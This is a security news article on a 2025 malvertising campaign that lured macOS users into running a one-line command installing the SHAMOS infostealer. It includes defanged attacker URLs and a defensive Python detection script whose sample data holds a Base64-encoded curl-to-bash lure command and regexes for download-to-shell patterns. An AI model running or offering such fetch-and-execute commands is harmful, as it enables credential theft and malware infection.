A sophisticated malvertising campaign that sought to deploy a variant of Atomic macOS Stealer (AMOS) has targeted hundreds of organizations.
Between June and August 2025, the campaign diverted victims to fraudulent macOS help websites that encouraged them to execute a malicious one-line installation command.
The aim was for victims to ultimately be infected with the SHAMOS variant of the AMOS infostealer, which was developed by malware-as-a-service (MaaS) group Cookie Spider.
During this period, CrowdStrike said it blocked the malvertising campaign from attempting to compromise over 300 of its customer environments.
“This campaign underscores the popularity of malicious one-line installation commands among eCrime actors,” CrowdStrike said in a recent blog.
This technique allows cybercriminals to bypass Gatekeeper security checks and install the Mach-O executable (a binary format primarily used by macOS) directly onto victim devices.
Cuckoo Stealer and SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns occurring between May 2024 and January 2025.
CrowdStrike noted that the malvertising site appeared to Google searchers in locations including the UK, Japan, China, Colombia, Canada, Mexico, Italy and others.
The firm’s analysis said that no victims were located in Russia.
“This is likely due to the fact that Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia,” the company said.
The fraudulent macOS help websites gave false instructions on how users could fix their issues.
However, the pages instruct the victims to copy, paste and execute a malicious one-line installation command which decodes a Base64-encoded string.
This then downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh. This file is a Bash script that captures the user’s password and downloads a SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update.
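The chain described above (a Base64 blob decoded and piped into a shell, which then fetches a script and runs it) is something endpoint telemetry can flag from the process command line alone. The following detection helper is an added example written for this article, not CrowdStrike's code; the sample command lines are constructed, and the only indicator it uses is the defanged distribution domain quoted above.

```python
import base64
import re

# Indicator published in the article, kept in its defanged form.
KNOWN_DOMAINS = ("icloudservers[.]com",)

# A run of Base64 characters long enough to hide a command.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# curl/wget output piped straight into sh, bash or zsh (optionally via sudo).
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b")
# base64 decode output piped straight into a shell.
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b")


def decoded_payloads(cmdline: str) -> list[str]:
    """Return the readable text of every Base64-looking token in a command line."""
    found = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            found.append(text)
    return found


def assess(cmdline: str) -> list[str]:
    """Return sorted reasons why a command line matches the one-line installer lure."""
    reasons = set()
    if DECODE_TO_SHELL.search(cmdline):
        reasons.add("base64 decode piped to shell")
    # Inspect both the raw line and anything hidden inside Base64 blobs.
    for view in [cmdline, *decoded_payloads(cmdline)]:
        if DOWNLOAD_TO_SHELL.search(view):
            reasons.add("download piped to shell")
        if any(domain in view for domain in KNOWN_DOMAINS):
            reasons.add("known distribution domain")
    return sorted(reasons)


# Constructed sample telemetry: the hidden command is built here so the
# Base64 is exact, and the domain stays defanged so nothing resolves.
SAMPLE_PAYLOAD = "curl -fsSL https://icloudservers[.]com/gm/install.sh | bash"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_CMDLINES = [
    "brew install wget",                      # benign
    "echo 'hello world' | base64",            # benign: encodes, does not execute
    f"echo {SAMPLE_B64} | base64 -d | bash",  # the lure pattern
    "curl -fsSL https://example.com/setup.sh | sh",  # generic curl-to-shell
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(assess(line) or "clean", "<-", line[:60])
```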
Since first reporting on this type of campaign in June 2025, CrowdStrike Counter Adversary Operations said it has continued to observe opportunistic eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that download SHAMOS.
CrowdStrike’s Counter Adversary Operations has assessed with high confidence that eCrime actors are likely to continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers.